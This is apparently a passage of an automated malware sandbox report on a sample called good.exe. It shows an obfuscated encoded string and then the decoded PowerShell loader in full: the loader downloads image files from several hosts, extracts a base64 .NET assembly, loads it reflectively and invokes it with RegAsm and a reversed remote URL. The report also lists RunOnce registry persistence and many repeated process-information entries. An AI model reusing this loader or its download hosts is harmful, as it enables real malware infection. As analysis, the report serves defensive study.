G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZgBn@Gg@Z@@v@GY@ZwBk@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@C4@agBw@Gc@Pw@1@DE@Nw@2@DE@Mw@n@Cw@I@@n@Gg@d@@z@DU@LwBu@GE@bgBv@C8@cgBl@GY@cw@v@Gg@ZQBh@GQ@cw@v@G0@YQBp@G4@LwBu@GU@dwBf@Gk@bQBn@DE@Mg@z@C4@agBw@Gc@Jw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@C@@PQ@g@EQ@bwB3@G4@b@Bv@GE@Z@BE@GE@d@Bh@EY@cgBv@G0@T@Bp@G4@awBz@C@@J@Bs@Gk@bgBr@HM@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@Bp@GY@I@@o@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@C0@bgBl@C@@J@Bu@HU@b@Bs@Ck@I@B7@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@g@D0@I@Bb@FM@eQBz@HQ@ZQBt@C4@V@Bl@Hg@d@@u@EU@bgBj@G8@Z@Bp@G4@ZwBd@Do@OgBV@FQ@Rg@4@C4@RwBl@HQ@UwB0@HI@aQBu@Gc@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBT@FQ@QQBS@FQ@Pg@+@Cc@Ow@g@CQ@ZQBu@GQ@RgBs@GE@Zw@g@D0@I@@n@Dw@P@BC@EE@UwBF@DY@N@Bf@EU@TgBE@D4@Pg@n@Ds@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@Ck@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@t@Gc@ZQ@g@D@@I@@t@GE@bgBk@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@Gc@d@@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@p@C@@ew@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@Cs@PQ@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@LgBM@GU@bgBn@HQ@a@@7@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YgBh@HM@ZQ@2@DQ@T@Bl@G4@ZwB0@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@DJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfghd/fgd/downloads/test.jpg?517613', 'ht35/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.chAFAmk/selif_cilbup/46.622.06.26//:', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -execJump to behavior
                    Source: good.exeStatic PE information: 0xAE1BC4F8 [Tue Jul 25 12:18:00 2062 UTC]
                    Source: C:\Users\user\Desktop\good.exeCode function: 0_2_00007FF7319130EC GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,SetCurrentDirectoryA,0_2_00007FF7319130EC
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 12_3_02B058BC pushad ; ret 12_3_02B058C1
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 12_3_02B0588E push eax; iretd 12_3_02B0589D
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 12_3_02B028ED push ebx; ret 12_3_02B028E4
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 12_3_02B018C0 push ebp; retf 12_3_02B018C1
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 12_3_02B06012 push 00000038h; iretd 12_3_02B0601D
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 12_3_02B05606 pushad ; retf 12_3_02B05619
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 12_3_02B0225D push eax; ret 12_3_02B0225F
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 12_3_02B0278B push ebx; ret 12_3_02B028E4
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 12_3_02B00FEA push eax; ret 12_3_02B00FF5
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 12_3_02B05FEE push FFFFFFD2h; retf 12_3_02B06011
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 12_3_02B04920 push 0000002Eh; iretd 12_3_02B04922
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 12_3_02B05F0C push es; iretd 12_3_02B05F0D
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 12_3_02B01179 push FFFFFF82h; iretd 12_3_02B0117B
                    Source: C:\Users\user\Desktop\good.exeCode function: 0_2_00007FF731911684 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,0_2_00007FF731911684
                    Source: C:\Users\user\Desktop\good.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
                    Source: C:\Users\user\Desktop\good.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
                    Source: C:\Users\user\Desktop\good.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
                    Source: C:\Users\user\Desktop\good.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
